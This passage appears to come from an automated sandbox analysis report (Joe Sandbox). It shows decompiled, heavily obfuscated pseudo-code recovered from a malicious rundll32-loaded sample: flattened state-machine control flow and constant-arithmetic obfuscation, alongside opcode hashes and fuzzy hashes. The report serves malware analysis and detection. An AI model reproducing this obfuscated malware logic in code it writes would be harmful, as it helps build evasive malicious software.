                                                                                                                                  						if(_t408 == 0x3749e66) {
                                                                                                                                  							_t469 = E002E0AE0(_v176, _v168);
                                                                                                                                  							_t408 = 0x46acfc9;
                                                                                                                                  							 *((intOrPtr*)(_t406 + 4)) = _v160 + _v124 + _t469;
                                                                                                                                  							continue;
                                                                                                                                  						}
                                                                                                                                  						if(_t408 == 0x46acfc9) {
                                                                                                                                  							_push(_t408);
                                                                                                                                  							_push(_t408);
                                                                                                                                  							_t403 = E002D7FF2( *((intOrPtr*)(_t406 + 4)));
                                                                                                                                  							 *_t406 = _t403;
                                                                                                                                  							if(_t403 == 0) {
                                                                                                                                  								_t408 = 0xd9acfaa;
                                                                                                                                  							} else {
                                                                                                                                  								_v132 = 1;
                                                                                                                                  								_t408 = 0xfb3baa2;
                                                                                                                                  							}
                                                                                                                                  							continue;
                                                                                                                                  						}
                                                                                                                                  						if(_t408 != 0x8e80a37) {
                                                                                                                                  							goto L31;
                                                                                                                                  						}
                                                                                                                                  						_t408 = 0xfac38db;
                                                                                                                                  					}
                                                                                                                                  					if(_t408 == 0xf0a856e) {
                                                                                                                                  						_t377 = E002D70B3(_v164,  &_v128,  &_v120, _v232, _v172);
                                                                                                                                  						_t471 = _t471 + 0xc;
                                                                                                                                  						if(_t377 == 0) {
                                                                                                                                  							_t408 = 0xfbb751f;
                                                                                                                                  							goto L31;
                                                                                                                                  						}
                                                                                                                                  						_t408 = 0x3749e66;
                                                                                                                                  						goto L1;
                                                                                                                                  					}
                                                                                                                                  					if(_t408 == 0xfac38db) {
                                                                                                                                  						_push( *_t455);
                                                                                                                                  						_t378 = E002EAE6D(_v240,  &_v32,  *((intOrPtr*)(_t455 + 4)), _v180, _t408, _v248);
                                                                                                                                  						_t471 = _t471 + 0x14;
                                                                                                                                  						if(_t378 == 0) {
                                                                                                                                  							goto L20;
                                                                                                                                  						}
                                                                                                                                  						_t408 = 0x15a913b;
                                                                                                                                  						goto L1;
                                                                                                                                  					}
                                                                                                                                  					if(_t408 == 0xfb3baa2) {
                                                                                                                                  						_t457 =  *_t406;
                                                                                                                                  						E002D7E87(_v268, _v216, _v200, _t457);
                                                                                                                                  						_t458 = _t457 + _v264;
                                                                                                                                  						E002DED7E(_v212, _t458, _v152, _v128, _v124);
                                                                                                                                  						_t459 = _t458 + _v124;
                                                                                                                                  						E002DA492(_v196, _v220, _t459, _t469);
                                                                                                                                  						_t450 =  &(_t459[_t469]);
                                                                                                                                  						_t471 = _t471 + 0x20;
                                                                                                                                  						_t414 = _t459;
                                                                                                                                  						if(_t459 >= _t450) {
                                                                                                                                  							L25:
                                                                                                                                  							_t386 = E002E0AE0(0xe, 0);
                                                                                                                                  							_t408 = 0xd9acfaa;
                                                                                                                                  							 *((char*)(_t386 + _t459)) = 0;
                                                                                                                                  							_t456 = _a4;
                                                                                                                                  							goto L1;
                                                                                                                                  						} else {
                                                                                                                                  							goto L22;
                                                                                                                                  						}
                                                                                                                                  						do {
                                                                                                                                  							L22:
                                                                                                                                  							if(( *_t414 & 0x000000ff) == _v256) {
                                                                                                                                  								 *_t414 = 0xc3;
                                                                                                                                  							}
                                                                                                                                  							_t414 =  &(_t414[1]);
                                                                                                                                  						} while (_t414 < _t450);
                                                                                                                                  						goto L25;
                                                                                                                                  					}
                                                                                                                                  					if(_t408 != 0xfbb751f) {
                                                                                                                                  						goto L31;
                                                                                                                                  					}
                                                                                                                                  					E002E8519(_v224, _v156, _v120);
                                                                                                                                  					goto L20;
                                                                                                                                  					L31:
                                                                                                                                  				} while (_t408 != 0x5927677);
                                                                                                                                  				goto L20;
                                                                                                                                  			}












































































                                                                                                                                  0x002dd60e
                                                                                                                                  0x002dd613
                                                                                                                                  0x002dd616
                                                                                                                                  0x002dd619
                                                                                                                                  0x002dd61d
                                                                                                                                  0x002dd630
                                                                                                                                  0x002dd63f
                                                                                                                                  0x002dd646
                                                                                                                                  0x002dd64b
                                                                                                                                  0x002dd64f
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002dd61f
                                                                                                                                  0x002dd61f
                                                                                                                                  0x002dd626
                                                                                                                                  0x002dd628
                                                                                                                                  0x002dd628
                                                                                                                                  0x002dd62b
                                                                                                                                  0x002dd62c
                                                                                                                                  0x00000000
                                                                                                                                  0x002dd61f
                                                                                                                                  0x002dd589
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002dd5a1
                                                                                                                                  0x00000000
                                                                                                                                  0x002dd6c7
                                                                                                                                  0x002dd6c7
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $qb+$rg'$uwjP$za%$M
                                                                                                                                  • API String ID: 0-3591755710
                                                                                                                                  • Opcode ID: da7435b32c5398bb183d40738941ae657b2ab1072f7b303e1b7fc0a3233c1fa4
                                                                                                                                  • Instruction ID: 2c71b519eddf28031915e384fe40edbff7abcd168f108928507b7c69e8b40669
                                                                                                                                  • Opcode Fuzzy Hash: da7435b32c5398bb183d40738941ae657b2ab1072f7b303e1b7fc0a3233c1fa4
                                                                                                                                  • Instruction Fuzzy Hash: 751231715183818FD368CF25C486A5BFBF1FBC4348F50891EF69A8A261DBB19958CF42
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 94%
                                                                                                                                  			E002E907F(intOrPtr* __ecx) {
                                                                                                                                  				intOrPtr* _v4;
                                                                                                                                  				char _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				signed int _v16;
                                                                                                                                  				signed int _v20;
                                                                                                                                  				signed int _v24;
                                                                                                                                  				signed int _v28;
                                                                                                                                  				signed int _v32;
                                                                                                                                  				signed int _v36;
                                                                                                                                  				signed int _v40;
                                                                                                                                  				signed int _v44;
                                                                                                                                  				signed int _v48;
                                                                                                                                  				signed int _v52;
                                                                                                                                  				signed int _v56;
                                                                                                                                  				signed int _v60;
                                                                                                                                  				unsigned int _v64;
                                                                                                                                  				signed int _v68;
                                                                                                                                  				signed int _v72;
                                                                                                                                  				signed int _v76;
                                                                                                                                  				signed int _v80;
                                                                                                                                  				signed int _v84;
                                                                                                                                  				signed int _v88;
                                                                                                                                  				signed int _v92;
                                                                                                                                  				signed int _v96;
                                                                                                                                  				signed int _v100;
                                                                                                                                  				signed int _v104;
                                                                                                                                  				signed int _v108;
                                                                                                                                  				signed int _v112;
                                                                                                                                  				signed int _v116;
                                                                                                                                  				signed int _v120;
                                                                                                                                  				signed int _v124;
                                                                                                                                  				signed int _v128;
                                                                                                                                  				signed int _v132;
                                                                                                                                  				void* _t284;
                                                                                                                                  				void* _t285;
                                                                                                                                  				intOrPtr _t286;
                                                                                                                                  				void* _t293;
                                                                                                                                  				void* _t301;
                                                                                                                                  				signed int _t304;
                                                                                                                                  				signed int _t305;
                                                                                                                                  				signed int _t306;
                                                                                                                                  				signed int _t307;
                                                                                                                                  				signed int _t308;
                                                                                                                                  				void* _t311;
                                                                                                                                  				intOrPtr* _t343;
                                                                                                                                  				void* _t347;
                                                                                                                                  				signed int* _t348;
                                                                                                                                  
                                                                                                                                  				_t348 =  &_v132;
                                                                                                                                  				_t343 = __ecx;
                                                                                                                                  				_v4 = __ecx;
                                                                                                                                  				_v40 = 0x7c806d;
                                                                                                                                  				_v40 = _v40 + 0x9e80;
                                                                                                                                  				_v40 = _v40 ^ 0x007d1eed;
                                                                                                                                  				_v12 = 0xea5ac0;
                                                                                                                                  				_v12 = _v12 + 0xffff451e;
                                                                                                                                  				_v12 = _v12 ^ 0x00e99fde;
                                                                                                                                  				_v24 = 0xace3a9;
                                                                                                                                  				_t347 = 0;
                                                                                                                                  				_t304 = 0xa;
                                                                                                                                  				_v24 = _v24 / _t304;
                                                                                                                                  				_v24 = _v24 ^ 0x001149f7;
                                                                                                                                  				_t301 = 0x97dfe60;
                                                                                                                                  				_v112 = 0x63471f;
                                                                                                                                  				_v112 = _v112 ^ 0x706c6b64;
                                                                                                                                  				_v112 = _v112 | 0x0d4cecae;
                                                                                                                                  				_v112 = _v112 << 3;
                                                                                                                                  				_v112 = _v112 ^ 0xea7f67f8;
                                                                                                                                  				_v28 = 0x68a2fc;
                                                                                                                                  				_t305 = 0x5b;
                                                                                                                                  				_v28 = _v28 * 0x1c;
                                                                                                                                  				_v28 = _v28 ^ 0x0b71d390;
                                                                                                                                  				_v84 = 0x508d02;
                                                                                                                                  				_v84 = _v84 | 0x7bfb7ba7;
                                                                                                                                  				_v84 = _v84 ^ 0x7bffa5e3;
                                                                                                                                  				_v124 = 0xc0d8a4;
                                                                                                                                  				_v124 = _v124 + 0xffffd7c7;
                                                                                                                                  				_v124 = _v124 ^ 0xdba96bec;
                                                                                                                                  				_v124 = _v124 + 0xffffcd63;
                                                                                                                                  				_v124 = _v124 ^ 0xdb66cc39;
                                                                                                                                  				_v116 = 0xc7a01f;
                                                                                                                                  				_v116 = _v116 * 0x50;
                                                                                                                                  				_v116 = _v116 << 7;
                                                                                                                                  				_v116 = _v116 + 0x525d;
                                                                                                                                  				_v116 = _v116 ^ 0x3100192e;
                                                                                                                                  				_v88 = 0x173e76;
                                                                                                                                  				_v88 = _v88 / _t305;
                                                                                                                                  				_v88 = _v88 + 0xcdb8;
                                                                                                                                  				_v88 = _v88 ^ 0x00098d3b;
                                                                                                                                  				_v48 = 0x3a45de;
                                                                                                                                  				_t306 = 0x3d;
                                                                                                                                  				_v48 = _v48 / _t306;
                                                                                                                                  				_v48 = _v48 ^ 0x0006d702;
                                                                                                                                  				_v52 = 0xd8d0f7;
                                                                                                                                  				_v52 = _v52 | 0xabcf1793;
                                                                                                                                  				_v52 = _v52 + 0xffff6a1e;
                                                                                                                                  				_v52 = _v52 ^ 0xabd8e28c;
                                                                                                                                  				_v64 = 0xff5420;
                                                                                                                                  				_v64 = _v64 >> 9;
                                                                                                                                  				_v64 = _v64 + 0xffff2626;
                                                                                                                                  				_v64 = _v64 ^ 0xfff0768b;
                                                                                                                                  				_v80 = 0x65116e;
                                                                                                                                  				_v80 = _v80 >> 9;
                                                                                                                                  				_v80 = _v80 | 0xde6750c8;
                                                                                                                                  				_v80 = _v80 ^ 0xde6208e1;
                                                                                                                                  				_v56 = 0x2d6903;
                                                                                                                                  				_v56 = _v56 >> 0xc;
                                                                                                                                  				_v56 = _v56 + 0xffff4c70;
                                                                                                                                  				_v56 = _v56 ^ 0xfff58c10;
                                                                                                                                  				_v132 = 0xe5be5a;
                                                                                                                                  				_v132 = _v132 + 0xfffffbec;
                                                                                                                                  				_v132 = _v132 << 3;
                                                                                                                                  				_v132 = _v132 ^ 0x46ad3c03;
                                                                                                                                  				_v132 = _v132 ^ 0x418237eb;
                                                                                                                                  				_v108 = 0x3fa801;
                                                                                                                                  				_v108 = _v108 + 0x902;
                                                                                                                                  				_v108 = _v108 >> 7;
                                                                                                                                  				_v108 = _v108 ^ 0x9ac0b97a;
                                                                                                                                  				_v108 = _v108 ^ 0x9ac73a04;
                                                                                                                                  				_v72 = 0x454e35;
                                                                                                                                  				_v72 = _v72 + 0x4c9c;
                                                                                                                                  				_t307 = 0x29;
                                                                                                                                  				_v72 = _v72 / _t307;
                                                                                                                                  				_v72 = _v72 ^ 0x000328df;
                                                                                                                                  				_v32 = 0x46b9f;
                                                                                                                                  				_v32 = _v32 >> 4;
                                                                                                                                  				_v32 = _v32 ^ 0x0003d4b9;
                                                                                                                                  				_v16 = 0xab007f;
                                                                                                                                  				_v16 = _v16 ^ 0x56a4e801;
                                                                                                                                  				_v16 = _v16 ^ 0x56002f48;
                                                                                                                                  				_v100 = 0xb9d48c;
                                                                                                                                  				_v100 = _v100 | 0xb434f54e;
                                                                                                                                  				_v100 = _v100 >> 0x10;
                                                                                                                                  				_v100 = _v100 ^ 0x000dcd0e;
                                                                                                                                  				_v92 = 0x17070b;
                                                                                                                                  				_t308 = 0x37;
                                                                                                                                  				_v92 = _v92 / _t308;
                                                                                                                                  				_v92 = _v92 << 7;
                                                                                                                                  				_v92 = _v92 ^ 0x0038b56c;
                                                                                                                                  				_v60 = 0xdb418a;
                                                                                                                                  				_v60 = _v60 * 0x4d;
                                                                                                                                  				_v60 = _v60 << 2;
                                                                                                                                  				_v60 = _v60 ^ 0x07c52fa3;
                                                                                                                                  				_v68 = 0x99d1b0;
                                                                                                                                  				_v68 = _v68 << 1;
                                                                                                                                  				_v68 = _v68 + 0xadc1;
                                                                                                                                  				_v68 = _v68 ^ 0x01384a96;
                                                                                                                                  				_v120 = 0xfb4a64;
                                                                                                                                  				_v120 = _v120 | 0x92bfeeef;
                                                                                                                                  				_v120 = _v120 + 0x1827;
                                                                                                                                  				_v120 = _v120 >> 5;
                                                                                                                                  				_v120 = _v120 ^ 0x0494323d;
                                                                                                                                  				_v128 = 0xf75f57;
                                                                                                                                  				_v128 = _v128 >> 4;
                                                                                                                                  				_v128 = _v128 + 0xe158;
                                                                                                                                  				_v128 = _v128 + 0xffff16ce;
                                                                                                                                  				_v128 = _v128 ^ 0x000f9950;
                                                                                                                                  				_v76 = 0xb94cf;
                                                                                                                                  				_v76 = _v76 | 0xc911a6ab;
                                                                                                                                  				_v76 = _v76 >> 2;
                                                                                                                                  				_v76 = _v76 ^ 0x3240c46f;
                                                                                                                                  				_v104 = 0x7ca07;
                                                                                                                                  				_v104 = _v104 * 0x23;
                                                                                                                                  				_v104 = _v104 >> 4;
                                                                                                                                  				_v104 = _v104 ^ 0xe4d42587;
                                                                                                                                  				_v104 = _v104 ^ 0xe4c14657;
                                                                                                                                  				_v44 = 0x308a5a;
                                                                                                                                  				_v44 = _v44 >> 0x10;
                                                                                                                                  				_v44 = _v44 ^ 0x0006e55e;
                                                                                                                                  				_v96 = 0x427aa5;
                                                                                                                                  				_v96 = _v96 + 0xed3d;
                                                                                                                                  				_v96 = _v96 + 0xffff13f4;
                                                                                                                                  				_v96 = _v96 ^ 0x0046a078;
                                                                                                                                  				_v20 = 0xf8f4;
                                                                                                                                  				_v20 = _v20 * 0x4a;
                                                                                                                                  				_t284 = 0x4469cd4;
                                                                                                                                  				_v20 = _v20 ^ 0x004ab19f;
                                                                                                                                  				_v36 = 0x7998ac;
                                                                                                                                  				_v36 = _v36 >> 0xc;
                                                                                                                                  				_v36 = _v36 ^ 0x0008cf6c;
                                                                                                                                  				do {
                                                                                                                                  					while(_t301 != _t284) {
                                                                                                                                  						if(_t301 == 0x661bd7c) {
                                                                                                                                  							E002D957D(_v8, _v96, _v20, _v28, _v36);
                                                                                                                                  						} else {
                                                                                                                                  							if(_t301 == 0x8cd68b1) {
                                                                                                                                  								_push(_v116);
                                                                                                                                  								_push(_v124);
                                                                                                                                  								_t293 = E002EDCF7(_v84, 0x2d1954, __eflags);
                                                                                                                                  								_push(_v52);
                                                                                                                                  								_push(_v48);
                                                                                                                                  								__eflags = E002D9462(_t293, _v80,  &_v8, E002EDCF7(_v88, 0x2d1814, __eflags), _v56, _v40) - _v12;
                                                                                                                                  								_t301 =  ==  ? 0x4469cd4 : 0x94c729c;
                                                                                                                                  								E002DA8B0(_v132, _t293, _v108);
                                                                                                                                  								E002DA8B0(_v72, _t294, _v32);
                                                                                                                                  								_t343 = _v4;
                                                                                                                                  								L8:
                                                                                                                                  								_t284 = 0x4469cd4;
                                                                                                                                  								_t348 =  &(_t348[0xb]);
                                                                                                                                  								goto L9;
                                                                                                                                  							} else {
                                                                                                                                  								if(_t301 != 0x97dfe60) {
                                                                                                                                  									goto L9;
                                                                                                                                  								} else {
                                                                                                                                  									_t301 = 0x8cd68b1;
                                                                                                                                  									continue;
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						L12:
                                                                                                                                  						return _t347;
                                                                                                                                  					}
                                                                                                                                  					_push(_v92);
                                                                                                                                  					_push(_v100);
                                                                                                                                  					_t285 = E002EDCF7(_v16, 0x2d1854, __eflags);
                                                                                                                                  					_pop(_t311);
                                                                                                                                  					_t286 =  *0x2f3dfc; // 0x0
                                                                                                                                  					__eflags = E002DAA4D(_v60, _t285,  *((intOrPtr*)(_t343 + 4)), _v120, _v24, _v8, _t286 + 0x40, _v128, _t311,  *_t343, _v76) - _v112;
                                                                                                                                  					_t301 = 0x661bd7c;
                                                                                                                                  					_t347 =  ==  ? 1 : _t347;
                                                                                                                                  					E002DA8B0(_v104, _t285, _v44);
                                                                                                                                  					goto L8;
                                                                                                                                  					L9:
                                                                                                                                  					__eflags = _t301 - 0x94c729c;
                                                                                                                                  				} while (__eflags != 0);
                                                                                                                                  				goto L12;
                                                                                                                                  			}


















































                                                                                                                                  0x002e95b5
                                                                                                                                  0x002e95ba
                                                                                                                                  0x00000000
                                                                                                                                  0x002e9497
                                                                                                                                  0x002e949d
                                                                                                                                  0x00000000
                                                                                                                                  0x002e94a3
                                                                                                                                  0x002e94a3
                                                                                                                                  0x00000000
                                                                                                                                  0x002e94a3
                                                                                                                                  0x002e949d
                                                                                                                                  0x002e9495
                                                                                                                                  0x002e95ef
                                                                                                                                  0x002e95f9
                                                                                                                                  0x002e95f9
                                                                                                                                  0x002e953c
                                                                                                                                  0x002e9545
                                                                                                                                  0x002e9550
                                                                                                                                  0x002e9556
                                                                                                                                  0x002e9564
                                                                                                                                  0x002e95a0
                                                                                                                                  0x002e95a2
                                                                                                                                  0x002e95ab
                                                                                                                                  0x002e95b0
                                                                                                                                  0x00000000
                                                                                                                                  0x002e95bd
                                                                                                                                  0x002e95bd
                                                                                                                                  0x002e95bd
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 5NE$=$H/$X$]R$dklp
                                                                                                                                  • API String ID: 0-668800459
                                                                                                                                  • Opcode ID: c645233c1a82dd96af2bdd8a06c60dad06a7b88e4c592a53d4683dbe577c5d7a
                                                                                                                                  • Instruction ID: 076c12471b6ce9abaed08c8aee9ef9b91eeaee52b38938ac26f27acbdbd9749b
                                                                                                                                  • Opcode Fuzzy Hash: c645233c1a82dd96af2bdd8a06c60dad06a7b88e4c592a53d4683dbe577c5d7a
                                                                                                                                  • Instruction Fuzzy Hash: 6FD11FB11097808FD369CF25C48A50BBBF1FBC4758F50891EF5AA86260DBB58959CF43
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                  			E002F0F33() {
                                                                                                                                  				signed int _t237;
                                                                                                                                  				signed char _t246;
                                                                                                                                  				signed short _t255;
                                                                                                                                  				signed int _t262;
                                                                                                                                  				signed char _t269;
                                                                                                                                  				intOrPtr* _t292;
                                                                                                                                  				signed short _t301;
                                                                                                                                  				void* _t302;
                                                                                                                                  				signed short _t306;
                                                                                                                                  				signed int _t309;
                                                                                                                                  				signed int _t310;
                                                                                                                                  				signed int _t311;
                                                                                                                                  				signed int _t312;
                                                                                                                                  				signed int _t313;
                                                                                                                                  				signed int _t314;
                                                                                                                                  				signed int _t315;
                                                                                                                                  				signed short _t319;
                                                                                                                                  				void* _t321;
                                                                                                                                  
                                                                                                                                  				 *(_t321 + 0x20) = 0xee0abc;
                                                                                                                                  				 *(_t321 + 0x20) =  *(_t321 + 0x20) | 0x247001dc;
                                                                                                                                  				_t262 = 0x40ff1a8;
                                                                                                                                  				 *(_t321 + 0x30) =  *(_t321 + 0x20) * 0xb;
                                                                                                                                  				 *(_t321 + 0x30) =  *(_t321 + 0x30) ^ 0x96ee7e42;
                                                                                                                                  				 *(_t321 + 0x14) = 0x97563a;
                                                                                                                                  				 *(_t321 + 0x14) =  *(_t321 + 0x14) + 0xa3ba;
                                                                                                                                  				 *(_t321 + 0x14) =  *(_t321 + 0x14) + 0x7434;
                                                                                                                                  				_t309 = 0x68;
                                                                                                                                  				 *(_t321 + 0x18) =  *(_t321 + 0x14) / _t309;
                                                                                                                                  				 *(_t321 + 0x18) =  *(_t321 + 0x18) ^ 0x000fa3ad;
                                                                                                                                  				 *(_t321 + 0x54) = 0x46dfd;
                                                                                                                                  				_t310 = 0x22;
                                                                                                                                  				 *(_t321 + 0x54) =  *(_t321 + 0x54) * 0x3f;
                                                                                                                                  				 *(_t321 + 0x54) =  *(_t321 + 0x54) ^ 0x011c0bd3;
                                                                                                                                  				 *(_t321 + 0x50) = 0x65d669;
                                                                                                                                  				 *(_t321 + 0x50) =  *(_t321 + 0x50) >> 4;
                                                                                                                                  				 *(_t321 + 0x50) =  *(_t321 + 0x50) ^ 0x0002663c;
                                                                                                                                  				 *(_t321 + 0x1c) = 0xa5dab8;
                                                                                                                                  				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) * 0x23;
                                                                                                                                  				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) >> 2;
                                                                                                                                  				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) << 0xd;
                                                                                                                                  				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) ^ 0x67379b84;
                                                                                                                                  				 *(_t321 + 0x58) = 0x508bac;
                                                                                                                                  				 *(_t321 + 0x58) =  *(_t321 + 0x58) + 0x81b9;
                                                                                                                                  				 *(_t321 + 0x58) =  *(_t321 + 0x58) ^ 0x005059a5;
                                                                                                                                  				 *(_t321 + 0x38) = 0x6dc462;
                                                                                                                                  				 *(_t321 + 0x38) =  *(_t321 + 0x38) / _t310;
                                                                                                                                  				 *(_t321 + 0x38) =  *(_t321 + 0x38) | 0x03137037;
                                                                                                                                  				 *(_t321 + 0x38) =  *(_t321 + 0x38) ^ 0x03112268;
                                                                                                                                  				 *(_t321 + 0x20) = 0x10f337;
                                                                                                                                  				 *(_t321 + 0x20) =  *(_t321 + 0x20) << 0x10;
                                                                                                                                  				_t311 = 0x7a;
                                                                                                                                  				 *(_t321 + 0x1c) =  *(_t321 + 0x20) * 0x5e;
                                                                                                                                  				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) >> 3;
                                                                                                                                  				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) ^ 0x09c781ed;
                                                                                                                                  				 *(_t321 + 0x28) = 0x5a8e56;
                                                                                                                                  				 *(_t321 + 0x28) =  *(_t321 + 0x28) ^ 0x165ac6ba;
                                                                                                                                  				 *(_t321 + 0x28) =  *(_t321 + 0x28) / _t311;
                                                                                                                                  				 *(_t321 + 0x28) =  *(_t321 + 0x28) >> 6;
                                                                                                                                  				 *(_t321 + 0x28) =  *(_t321 + 0x28) ^ 0x000470dc;
                                                                                                                                  				 *(_t321 + 0x40) = 0x558325;
                                                                                                                                  				 *(_t321 + 0x40) =  *(_t321 + 0x40) | 0xb8e268f7;
                                                                                                                                  				 *(_t321 + 0x40) =  *(_t321 + 0x40) + 0x4ee7;
                                                                                                                                  				 *(_t321 + 0x40) =  *(_t321 + 0x40) ^ 0xb8f7e628;
                                                                                                                                  				 *(_t321 + 0x3c) = 0x76576d;
                                                                                                                                  				 *(_t321 + 0x3c) =  *(_t321 + 0x3c) << 1;
                                                                                                                                  				 *(_t321 + 0x3c) =  *(_t321 + 0x3c) + 0xffff05d8;
                                                                                                                                  				 *(_t321 + 0x3c) =  *(_t321 + 0x3c) ^ 0x00efc885;
                                                                                                                                  				 *(_t321 + 0x38) = 0x7fcfc;
                                                                                                                                  				 *(_t321 + 0x38) =  *(_t321 + 0x38) >> 4;
                                                                                                                                  				 *(_t321 + 0x38) =  *(_t321 + 0x38) * 0x1e;
                                                                                                                                  				 *(_t321 + 0x38) =  *(_t321 + 0x38) ^ 0x0005448a;
                                                                                                                                  				 *(_t321 + 0x58) = 0x685aea;
                                                                                                                                  				 *(_t321 + 0x58) =  *(_t321 + 0x58) | 0x7e49cfb4;
                                                                                                                                  				 *(_t321 + 0x58) =  *(_t321 + 0x58) ^ 0x7e6c4597;
                                                                                                                                  				 *(_t321 + 0x24) = 0x2cb25b;
                                                                                                                                  				 *(_t321 + 0x24) =  *(_t321 + 0x24) | 0x98b89101;
                                                                                                                                  				 *(_t321 + 0x24) =  *(_t321 + 0x24) + 0x99b1;
                                                                                                                                  				 *(_t321 + 0x24) =  *(_t321 + 0x24) << 5;
                                                                                                                                  				 *(_t321 + 0x24) =  *(_t321 + 0x24) ^ 0x17a3ab17;
                                                                                                                                  				 *(_t321 + 0x20) = 0x5c4f5f;
                                                                                                                                  				_t312 = 0x75;
                                                                                                                                  				_t306 =  *(_t321 + 0x70);
                                                                                                                                  				 *(_t321 + 0x24) =  *(_t321 + 0x20) * 0x3b;
                                                                                                                                  				_t319 =  *(_t321 + 0x70);
                                                                                                                                  				 *(_t321 + 0x24) =  *(_t321 + 0x24) / _t312;
                                                                                                                                  				 *(_t321 + 0x24) =  *(_t321 + 0x24) ^ 0x3b5669b3;
                                                                                                                                  				 *(_t321 + 0x24) =  *(_t321 + 0x24) ^ 0x3b72ed3d;
                                                                                                                                  				 *(_t321 + 0x48) = 0x281dd4;
                                                                                                                                  				 *(_t321 + 0x48) =  *(_t321 + 0x48) >> 8;
                                                                                                                                  				 *(_t321 + 0x48) =  *(_t321 + 0x48) + 0xfffffe89;
                                                                                                                                  				 *(_t321 + 0x48) =  *(_t321 + 0x48) ^ 0x000ef8bb;
                                                                                                                                  				 *(_t321 + 0x60) = 0x5ec984;
                                                                                                                                  				 *(_t321 + 0x60) =  *(_t321 + 0x60) + 0xefe6;
                                                                                                                                  				 *(_t321 + 0x60) =  *(_t321 + 0x60) ^ 0x00516114;
                                                                                                                                  				 *(_t321 + 0x4c) = 0xbf15d9;
                                                                                                                                  				_t313 = 0x6c;
                                                                                                                                  				 *(_t321 + 0x4c) =  *(_t321 + 0x4c) / _t313;
                                                                                                                                  				_t314 = 0x6b;
                                                                                                                                  				 *(_t321 + 0x4c) =  *(_t321 + 0x4c) / _t314;
                                                                                                                                  				 *(_t321 + 0x4c) =  *(_t321 + 0x4c) ^ 0x000706ff;
                                                                                                                                  				 *(_t321 + 0x30) = 0x4468c3;
                                                                                                                                  				_t315 = 0x7e;
                                                                                                                                  				 *(_t321 + 0x2c) =  *(_t321 + 0x30) * 0x39;
                                                                                                                                  				 *(_t321 + 0x2c) =  *(_t321 + 0x2c) / _t315;
                                                                                                                                  				 *(_t321 + 0x2c) =  *(_t321 + 0x2c) * 0x49;
                                                                                                                                  				 *(_t321 + 0x2c) =  *(_t321 + 0x2c) ^ 0x08d90aee;
                                                                                                                                  				while(1) {
                                                                                                                                  					L1:
                                                                                                                                  					_t292 =  *0x2f3e08; // 0x0
                                                                                                                                  					while(1) {
                                                                                                                                  						L2:
                                                                                                                                  						_t237 =  *(_t321 + 0x60);
                                                                                                                                  						L3:
                                                                                                                                  						while(_t262 != 0x160fcc4) {
                                                                                                                                  							if(_t262 == 0x26954f0) {
                                                                                                                                  								 *_t237 = _t319;
                                                                                                                                  								_t262 = 0xfeff895;
                                                                                                                                  								 *_t292 =  *_t292 + 1;
                                                                                                                                  								_t237 = _t319;
                                                                                                                                  								 *(_t321 + 0x60) = _t237;
                                                                                                                                  								continue;
                                                                                                                                  							} else {
                                                                                                                                  								if(_t262 == 0x40ff1a8) {
                                                                                                                                  									_t179 = _t292 + 0x20; // 0x20
                                                                                                                                  									_t237 = _t179;
                                                                                                                                  									_t262 = 0x5ead19b;
                                                                                                                                  									 *(_t321 + 0x60) = _t237;
                                                                                                                                  									continue;
                                                                                                                                  								} else {
                                                                                                                                  									if(_t262 == 0x58e8483) {
                                                                                                                                  										_push(_t262);
                                                                                                                                  										_push(_t262);
                                                                                                                                  										_t302 = 0x40;
                                                                                                                                  										_t319 = E002D7FF2(_t302);
                                                                                                                                  										__eflags = _t319;
                                                                                                                                  										if(__eflags == 0) {
                                                                                                                                  											goto L20;
                                                                                                                                  										} else {
                                                                                                                                  											_t262 = 0x160fcc4;
                                                                                                                                  											goto L1;
                                                                                                                                  										}
                                                                                                                                  									} else {
                                                                                                                                  										if(_t262 == 0x5ead19b) {
                                                                                                                                  											_t255 = E002E7BA6(_t321 + 0x6c,  *(_t321 + 0x38), __eflags,  *(_t321 + 0x18), 0x2f3000);
                                                                                                                                  											 *(_t321 + 0x70) = _t255;
                                                                                                                                  											_t306 = _t255;
                                                                                                                                  											 *((intOrPtr*)(_t321 + 0x68)) = _t255 +  *((intOrPtr*)(_t321 + 0x68));
                                                                                                                                  											_t262 = 0x58e8483;
                                                                                                                                  											while(1) {
                                                                                                                                  												L1:
                                                                                                                                  												_t292 =  *0x2f3e08; // 0x0
                                                                                                                                  												goto L2;
                                                                                                                                  											}
                                                                                                                                  										} else {
                                                                                                                                  											if(_t262 == 0xd41016e) {
